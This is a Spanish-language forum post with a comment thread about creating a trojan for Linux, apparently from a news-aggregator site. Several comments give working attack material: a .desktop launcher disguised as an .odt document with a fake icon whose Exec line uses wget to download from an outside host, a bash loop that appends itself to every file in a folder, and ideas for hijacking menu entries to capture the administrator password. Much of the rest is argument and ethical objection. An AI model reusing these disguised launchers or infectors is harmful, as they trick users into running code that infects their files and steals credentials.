Publicado hace 15 años por VicenteAlfonso a despuesdegoogle.com

Geekzone explica detalladamente cómo crear un virus para Linux en cinco pasos. En realidad se trata de un script escrito por ejemplo en Python y disfrazado de archivo de texto adjunto, que el usuario ejecuta al abrirlo desde el escritorio poniendo en marcha la descarga e instalación del malware que se activará automáticamente en cada reinicio del sistema. Enlace a los pasos a seguir http://www.geekzone.co.nz/foobar/6229

Comentarios

D

#8, si supieras de lo que hablas, podrías hacerte el listo. Así sólo das pena.

times0000

#5 Eso no es un virus, es una cabronada lol

Moussenger

#8 Será porque los usuarios de Linux sabemos que SI hay Troyanos para Linux. Como es el caso de la noticia. Lo que NO hay es virus.

ikipol

HOYGAN ES AKI ONDE HENSEÑA A ASER TROIANO O BIRUH O LO KE COÑO SEA PAL UVUNTU.COM???!!!

D

#8 Hola soy un usuario de windows que te a votado negativo y tu actitud si que da pena.

culoman

Dá igual cómo lo programes, mientras necesites intervención humana, no será un virus

D

Hablas por hablar, porque no tienes ni idea del tema. Queremos pruebas o que fabriques la máquina "Y si..." del Profesor Hubert J. Farnsworth. Hasta entonces, es una discusión sin sentido.

Ferk

#13 El usuario no tiene que cambiar la configuracion de escritorio... solo hacer doble click en el archivo ".desktop" que no necesita permisos de ejecución para poderse ejecutar y que además aparece en GNOME/KDE sin mostrar la extensión y con la posibilidad de cambiar el icono a otro.

Osea que puedes camuflarlo para que parezca un "text.odt" con su icono y todo, y que se ejecute al hacer click sin ningún problema.

La cosa es que si esto realmente se empezase a hacer, los de GNOME y KDE no tardarían en cambiar un par de cosas para evitarlo.

D

#28 por algún motivo tu ejemplo no me funciona, pero me he puesto a jugar un poco y además he encontrado la forma de que el propio .desktop sea ejecutable como script sh y a la vez como .desktop:
========= fichero test.desktop =============
Ignore= /tmp/jaja

===== fin de fichero test.desktop =========

No funcionará si el .desktop no se guarda como "test", pero se pueden modificar los parametros del 'find' para que busque -name '*.desktop' y un tamaño determinado, o que compruebe que empieza por Ignore=.
~
~
~
~

Ferk

#27 El ejemplo es tan sencillo que te lo puedes crear tu mismo.

Abre el editor de texto y crea un nuevo archivo que ponga...

[Desktop Entry]
Type=Application
Encoding=UTF-8
Version=1.0
Name=caperucita.odt
Icon=/usr/share/icons/hicolor/32x32/mimetypes/openofficeorg3-oasis-text.png
Exec=/bin/bash -c 'cd ~; wget http://www.fugly.com/media/IMAGES/Funny/owned_kid.jpg; mv owned_kid.jpg PODRIA SER VIRUS.jpg '

Grabalo con el nombre "loquesea.desktop".
No tienes que darle ningún permiso de ejecución de ninguna clase.

Si abres con el explorador de KDE/GNOME la carpeta donde se bajó verás un odt... al hacerle doble click te descargará un archivo en tu carpeta de usuario... que si quisieramos podría ser un script malicioso que podríamos ejecutar automáticamnete desde ese mismo archivo desktop y a partir de ahí se autoreplicara por todo tu directorio de usuario y todas las interfaces de red o de disco a las que tu usuario tenga acceso que no requieran contraseña.

ikipol

#19 Me parece que no sabes lo que es el teorema de recursión, si lo supieras sabrías que lo que dices no es posible...

D

#16 No acabas de entender, ni de leer. Que son pruebas de concepto!!

Go to #15

ikipol

#16 Bueno... la existencia de virus en cualquier sistema operativo es un teorema clásico de teoría de la computabilidad, (consecuencia del primer teorema de recursión). Pero de ahí a que se pueda programar... va un abismo.

Moussenger

#19 Aunque haya dinero de por medio no puedes curar un cancer o un SIDA. El dinero de por medio no soluciona mas que cuatro cosas que maquilla.

Moussenger

Habla de un software que no es capaz de replicarse a si mismo.

ESO NO ES UN VIRUS. Troyano en todo caso.

#1 Me te adelantaste

VicenteAlfonso

#20#21 El dinero puede crear programas que puedan infectarse, y con eso programas para desinfectar, con el tiempo aparecen más programas y más virus. ¿Os suena la historia? Un sistema operativo no es el cuerpo humano.

D

#8 Alguien en su día mandó esto para desmentir el falso mito de que en gnu/linux no existen los virus, los cuales son meras pruebas de concepto (http://es.wikipedia.org/wiki/Prueba_de_concepto)

Virus en GNU/Linux ¿realidad o mito?

Hace 18 años | Por --761-- a e-ghost.deusto.es

Ferk

#32 Me abre una ventana diciendo que hubo un error al lanzar la aplicación. Y nada más.. no sale nada por stderr ni stdout. Uso GNOME en Ubuntu 8.10. Tal vez sea algo del copia pega de meneame, algo parecido a lo que pasaría con el que puse yo en #28.

D

#6 lol pero es que los viruses hacen cabronadas no? lol

Ferk

#29 También me da un error al ejecutar el tuyo.

Ferk

#29 Juas, mu currao. Así funcionará incluso sin conexion a internet.
Aunque bajar automáticamente el script de internet tiene la ventaja de que puedes actualizar la version del virus a distancia

Creo que al postear en meneame mi ejemplo se ha trastocado un poco el texto.. las barras invertidas antes de los espacios en "PODRIA SER VIRUS" no aparecen, y a lo mejor es una de las razones por las que no funciona.

En la página también hablan de la posibilidad de substituir desde la configuracion de ususario los ficheros .desktop de las entradas del menu de GNOME para que al ejecutar synaptic en realidad se ejecute el script, consiguiendo la contraseña de administrador.

La verdad es que tal como está ahora GNOME y KDE podrían aparecer virus chungos para Linux. Pero también es mucho más facil inmunizar un sistema Linux que uno Windows con un par de arreglos.

D

En Bash scripting:

#!/bin/sh
for FICHERO in *
do
tail -4 $0 >> $FICHERO
done

Rápido y sencillo.

D

#22 No sé, pero me han dicho que estos usuarios de GNU/Linux no tienen problemas de liquidad: http://www.nsa.gov/research/selinux/index.shtml
Ni crisis mediante. lol
Ni parece que tampoco estos (¿te suena el cuento del ordenador más potente del mundo y sus 490 hermanitos?) tampoco: http://www.top500.org/system/9707

D

#31 y cual es el error, por curiosidad?
Mientras he hecho pruebas ha podido funcionar o no, pero nunca mostraban ningún error.

Puede que versiones de GNOME más nuevas que la mía, o en KDE, no se permita que la primera linea sea diferente de "[Desktop Entry]"

D

#25 ¿no hay un ejemplo por ahí para probarlo y salir de dudas?

D

eso es un troyano ¡HOYGA!

k

Como se un hijo de la gran... en 5 pasos.
No desperdicieis vuestro talento en hacer daño.

Libertual

próximo capitulo:

"Como infectar con salmonela pasteles de crema."

Un poco de ética no viene mal.

VicenteAlfonso

#17 yo creo que en como todo, sólo se necesita que haya dinero de por medio. Si hay dinero, hay interés de dar por culo, mientras no haya grandes inversiones no habrá virus.
He visto cosas más imposibles en noticias sobre la informática.

#16 Y yo insisto, sólo hace falta dinero e inversiones y linux se plaga de virus. Que use la gente linux o no me la trae al fresco, yo también estuve un tiempo usand Ubuntu, pero eso no quita que se pueda comentar algo sobre ese sistema y te salten 50000 a machacar.

VicenteAlfonso

#15 pues menos mal, a ver si cierra algunas vocas, porque los linuxeros a veces son un poco cerraos de mollera. No se como alguien que usa linux y que tiene un poco de conocimientos informáticos, no es capaz de ver que siempre que haya un sistema operativo, puede haber virus.

Yo insisto que si ahora no hay virus en linux es porque no interesa. Pero realmente creeis que si linux lo usara el 90% de la población mundial, no iba a ser igual que windows... e iba a tener cientos de miles de virus... es increible que la gente que usa linux sea así.

#14 aquí la única pena la da la gente que se siente ofendida porque se habla de un simple virus para linux, eso si que da pena, mosquearse por decir semejante idiotez sobre linux... El comportamiento de muchos usuarios de linux si que da pena, más que pena es vergonzoso.

VicenteAlfonso

#10 rebota rebota que tu culo explota...

VicenteAlfonso

oohhhh, votos negativos porque a la gente no le gusta ver que su linux puede infectarse... vaya que novedad. Ni que os pagaran por usar linux.

Si linux no tiene virus es porque no interesa, ya que no lo usa ni un 1% de la población mundial.

Es increible que la gente vote esto negativo como "provocación", "amarillista", realmente da pena.